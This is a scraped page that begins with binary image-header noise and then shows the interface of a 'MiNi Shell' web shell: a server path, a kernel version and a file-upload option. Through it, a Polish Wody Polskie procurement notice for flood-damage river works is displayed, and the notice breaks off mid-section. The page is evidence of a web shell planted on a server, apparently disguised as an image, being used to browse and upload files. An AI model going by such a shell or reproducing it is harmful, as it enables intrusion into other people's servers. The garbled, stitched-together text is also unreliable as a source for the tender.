JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250410/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250410/0018474401-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Udrożnienie wybranych koryt cieków oraz przywrócenie funkcjonalności urządzeń wodnych w ramach usuwania skutków powodzi z 2024r.”<br/>Etap IV </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Państwowe Gospodarstwo Wodne Wody Polskie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 368302575</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Żelazna 59a</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-848</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gliwice@wody.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.gov.pl/web/wody-polskie</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Państwowa Osoba Prawna </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Udrożnienie wybranych koryt cieków oraz przywrócenie funkcjonalności urządzeń wodnych w ramach usuwania skutków powodzi z 2024r.”<br/>Etap IV </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3608237b-8803-4d42-8fb6-f571a9e04102</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00184744</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-04-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://przetargi.wody.gov.pl/wp/auctions/r22355,Udroznienie-wybranych-koryt-ciekow-oraz-przywrocenie-funkcjonalnosci-urzadzen-wo.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">http://www.przetargi.wody.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zgodnie z art. 61 ust. 1 ustawy Pzp,<br/>komunikacja między Zamawiającym a Wykonawcami odbywa się w formie elektronicznej, za pośrednictwem Platformy Zakupowej –<br/>zwanej dalej „Platformą” – pod adresem: https://przetargi.wody.gov.pl/.<br/>Korzystanie z Platformy jest nieodpłatne. Instrukcja korzystania z Platformy znajduje się pod adresem: www.przetargi.wody.gov.pl w<br/>zakładce: Instrukcja dla Wykonawców.<br/>Korzystanie z Platformy nie wymaga zarejestrowania konta na Platformie.<br/>Dokumenty związane z postępowaniem Zamawiający zamieszcza na Platformie w zakładce z przedmiotowym postępowaniem.<br/>Celem skomunikowania się z Zamawiającym (z wyłączeniem złożenia oferty oraz dokumentów lub oświadczeń składanych razem z<br/>ofertą, których sposób złożenia został opisany w pkt 14.1 – 14.6 specyfikacji warunków zamówienia, zwanej dalej „SWZ”),<br/>Wykonawca korzysta<br/>z zakładki „Zapytaj”. Zakładka ta służy również Zamawiającemu do komunikacji z Wykonawcami.<br/>Za datę wpływu wszelkiej korespondencji do Zamawiającego, w tym złożenia oferty oraz dokumentów lub oświadczeń składanych<br/>razem z ofertą, uważa się datę wczytania korespondencji na Platformie.<br/>Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści SWZ. Zamawiający jest obowiązany udzielić wyjaśnień<br/>niezwłocznie, jednak nie później niż na 6 dni przed upływem terminu składania ofert albo nie później niż na 4 dni przed upływem<br/>terminu składania ofert w przypadku, o którym mowa w art. 138 ust. 2 pkt 2 Pzp, pod warunkiem że wniosek o wyjaśnienie treści<br/>SWZ wpłynął do zamawiającego nie później niż na odpowiednio 14 albo 7 dni przed upływem terminu składania ofert.<br/>Jeżeli Zamawiający nie udzieli wyjaśnień w terminie, o którym mowa w pkt. wyżej, przedłuży termin składania ofert o czas niezbędny<br/>do zapoznania się wszystkich zainteresowanych Wykonawców z wyjaśnieniami niezbędnymi do należytego przygotowania i złożenia<br/>ofert. Treść wszystkich zapytań wraz wyjaśnieniami, Zamawiający udostępni/bez ujawniania źródła zapytania/na stronie internetowej<br/>prowadzonego postępowania, na której SWZ jest udostępniona. W przypadku rozbieżności pomiędzy treścią SWZ, a treścią<br/>udzielonych odpowiedzi, jako obowiązującą należy przyjąć treść pisma zawierającego późniejsze wyjaśnienia/oświadczenie<br/>Zamawiającego.<br/>Wszelkie wyjaśnienia, modyfikacje treści SWZ oraz inne informacje związane z niniejszym postępowaniem Zamawiający będzie<br/>zamieszczał wyłącznie na Platformie zakupowej w zakładce z przedmiotowym postępowaniem.<br/>Zamawiający zaleca sporządzenie korespondencji w następujących formatach: .doc., docx, .rtf, pdf, .xls.<br/>Zamawiający informuje, że adres e-mail: gliwice@wody.gov.pl oraz zamowienia.gliwice@wody.gov.pl wskazany w ogłoszeniu o<br/>zamówieniu, służy jedynie do przesyłania ogłoszeń i otrzymywania informacji zwrotnej z Biuletynu Zamówień Publicznych lub<br/>Dziennika Urzędowego Unii Europejskiej. Nie jest to adres do komunikacji z Wykonawcami.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem Platformy wynosi 150 MB.<br/>Dokumenty elektroniczne, oświadczenia lub cyfrowe odwzorowania dokumentów lub oświadczeń składane są przez Wykonawcę za<br/>pośrednictwem Platformy jako załączniki.<br/>Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub cyfrowych odwzorowań dokumentów lub oświadczeń musi być<br/>zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów dnia 30 grudnia 2020 r. w sprawie sposobu<br/>sporządzania<br/>i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia<br/>23 grudnia 2020 r.<br/>(Dz.U. 2020.poz.2415) w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać<br/>zamawiający od wykonawcy</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacja dotycząca przetwarzania danych osobowych. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy<br/>95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: a)<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275<br/>pkt 1 ustawy - Roboty budowlane. Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>administratorem Pani/Pana danych osobowych jest Państwowe Gospodarstwo Wodne Wody Polskie z siedzibą w Warszawie.<br/>Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>ul. Żelaznej 59A, 00-848 Warszawa, REGON: 368302575, NIP: 527-282-56-16;<br/>b) kontakt z Inspektorem ochrony danych w PGW WP możliwy jest pod adresem e-mail: iod@wody.gov.pl;<br/>c) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego oznaczonego numerem postępowania C.ROZ.2710.50.2025.PN prowadzonym na podstawie<br/>ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych;<br/>d) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych;<br/>e) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy z dnia 11 września 2019 r. Prawo zamówień<br/>publicznych, przez okres 4 lat licząc od końca roku kalendarzowego, w którym zakończono postępowanie o udzielenie zamówienia,<br/>a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>f) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy z dnia 11 września 2019 r.<br/>Prawo zamówień publicznych;<br/>g) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO.<br/>h) posiada Pani/Pan:<br/>- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>- na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/Pana danych osobowych (skorzystanie z prawa do<br/>sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą<br/>postanowień umowy w zakresie niezgodnym z przepisami ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych oraz nie<br/>może naruszać integralności protokołu oraz jego załączników);<br/>- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii<br/>Europejskiej lub państwa członkowskiego);<br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznają Państwo, że przetwarzanie danych<br/>osobowych Państwa dotyczących narusza przepisy RODO<br/>i) nie przysługuje Państwu:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">C.ROZ.2710.50.2025.PN</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 2760821,80 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">7</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.12.) Maksymalna liczba części, jaka może zostać udzielona jednemu wykonawcy: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> • Ręczne wykoszenie porostów gęstych twardych ze skarp – 21240m2;<br/>• Usuwanie zatorów, wiatrowałow, karpiny uprzątnięcie koryta z pozostałości po powodzi. Usuwanie zatorów, uprzątnięcie koryta z pozostałości po powodzi. W ramach pozycji przewidziano robociznę – kpl.;<br/>• Zrąbkowane gałęzi drzew i krzewów - 46 mp;<br/>• Załatwienie spraw związanych z uzyskaniem dostępu przez grunty osób trzecich do wskazanej lokalizacji rzeki w zakresie niezbędnym do wykonania zamówienia – kpl.;<br/>• Nadzory przyrodnicze – kpl;<br/>• Wycinka obłamów naciągniętych przez wody powodziowe oraz gałęzi drzew i krzewów utrudniających przepływ w korycie rzeki – 0,46 ha;<br/>• Wywożenie karpiny drewna z wiatrowałow oraz innych pozostałości naniesionych przez powódź na odległość 24km;<br/>• usuwanie karpiny , przygotowanie brzegu do wbudowania ubezpieczenia 480 m3;<br/>• profilowanie skarp wraz z wywozem urobku na odległość do 18km – 135 m3;<br/>• naprawa ubezpieczeń - wykonanie opasek pojedynczych z żerdzi o średnicy 15cm w gruncie kategorii III – 420 mb;<br/>• stabilizacja podmytych brzegów za pomocą narzutu kamiennego – 106 m3;<br/>• Cięcie pielęgnacyjne drzew - usunięcie suchych gałęzi, prześwietlenie i formowanie korony. – 22 szt. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 202646,09 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45246400-7 - Roboty w zakresie ochrony przeciwpowodziowej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">cena brutto (max 60%) – 60%<br/>kryterium okres gwarancji – 40%<br/>Kryterium 1 – „Cena” - będzie punktowane przez zamawiającego w oparciu <br/>o wyliczenie arytmetyczne: [najniższa cena brutto ze wszystkich ofert nie podlegających odrzuceniu : cena brutto oferty badanej] x 60 (waga), wg niżej podanego wzoru:<br/>C=(Najniższa cena ze wszystkich ofert nieodrzuconych)/(Cena oferty badanej)×60=ilość punktów<br/>Kryterium 2 – „Gwarancja”- będzie punktowane przez zamawiającego <br/>w oparciu o poniższą tabelkę:<br/>Dla części nr 1-2, 4-7:<br/><br/>Lp.	Elementy podlegające ocenie	Liczba punktów<br/>1	Okres gwarancji	24 miesiące	40<br/>2 18 miesięcy	20<br/>3 12 miesięcy	0<br/>Punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą ilość punktów za wszystkie kryteria z ofert nieodrzuconych, wg wzoru:<br/>Ł= C+G<br/>gdzie:<br/>Ł – łączna ilość punktów za wszystkie kryteria<br/>C – punkty przyznane w kryterium „Cena”<br/>G – punkty przyznane w kryterium „Gwarancja”<br/>2)	cena - 100 %<br/>UWAGA! Zamawiający może zastosować kryterium ceny jako jedyne kryterium oceny ofert albo jako kryterium o wadze przekraczającej 60%, jeżeli zostaną określone w opisie przedmiotu zamówienia wymagania jakościowe odnoszące się do co najmniej głównych elementów składających się na przedmiot zamówienia. (art. 246 ust. 2 ustawy Pzp).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> • Ręczne wykoszenie porostów gęstych twardych ze skarp – 56790m2;<br/>• Usuwanie zatorów, uprzątnięcie koryta z pozostałości po powodzi. W ramach pozycji przewidziano robociznę - 252,4 r-g;<br/>• Zrąbkowane gałęzi drzew i krzewów -120 mp;<br/>• Załatwienie spraw związanych z uzyskaniem dostępu przez grunty osób trzecich do wskazanej lokalizacji rzeki w zakresie niezbędnym do wykonania zamówienia – kpl.;<br/>• Nadzory przyrodnicze – kpl;<br/>• Wycinka obłamów naciągniętych przez wody powodziowe oraz gałęzi drzew i krzewów utrudniających przepływ w korycie rzeki – 1,2 ha;<br/>• Wywożenie karpiny oraz innych nieczystości na odległość 18km;<br/>• Usuwanie karpiny , przygotowanie brzegu do wbudowania ubezpieczenia 397,6 m3;<br/>• Profilowanie skarp wraz z wywozem urobku na odległość do 18km – 135 m3;<br/>• Naprawa ubezpieczeń - wykonanie opasek pojedynczych z żerdzi o średnicy 15cm w gruncie kategorii III – 268 mb;<br/>• Naprawa ubezpieczeń kamiennych – 92,7 m3;<br/>• Cięcie pielęgnacyjne drzew - usunięcie suchych gałęzi, prześwietlenie i formowanie korony. – 8 szt. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 203232,43 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45246400-7 - Roboty w zakresie ochrony przeciwpowodziowej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">cena brutto (max 60%) – 60%<br/>kryterium okres gwarancji – 40%<br/>Kryterium 1 – „Cena” - będzie punktowane przez zamawiającego w oparciu <br/>o wyliczenie arytmetyczne: [najniższa cena brutto ze wszystkich ofert nie podlegających odrzuceniu : cena brutto oferty badanej] x 60 (waga), wg niżej podanego wzoru:<br/>C=(Najniższa cena ze wszystkich ofert nieodrzuconych)/(Cena oferty badanej)×60=ilość punktów<br/>Kryterium 2 – „Gwarancja”- będzie punktowane przez zamawiającego <br/>w oparciu o poniższą tabelkę:<br/>Dla części nr 1-2, 4-7:<br/><br/>Lp.	Elementy podlegające ocenie	Liczba punktów<br/>1	Okres gwarancji	24 miesiące	40<br/>2 18 miesięcy	20<br/>3 12 miesięcy	0<br/>Punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą ilość punktów za wszystkie kryteria z ofert nieodrzuconych, wg wzoru:<br/>Ł= C+G<br/>gdzie:<br/>Ł – łączna ilość punktów za wszystkie kryteria<br/>C – punkty przyznane w kryterium „Cena”<br/>G – punkty przyznane w kryterium „Gwarancja”<br/>2)	cena - 100 %<br/>UWAGA! Zamawiający może zastosować kryterium ceny jako jedyne kryterium oceny ofert albo jako kryterium o wadze przekraczającej 60%, jeżeli zostaną określone w opisie przedmiotu zamówienia wymagania jakościowe odnoszące się do co najmniej głównych elementów składających się na przedmiot zamówienia. (art. 246 ust. 2 ustawy Pzp).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) 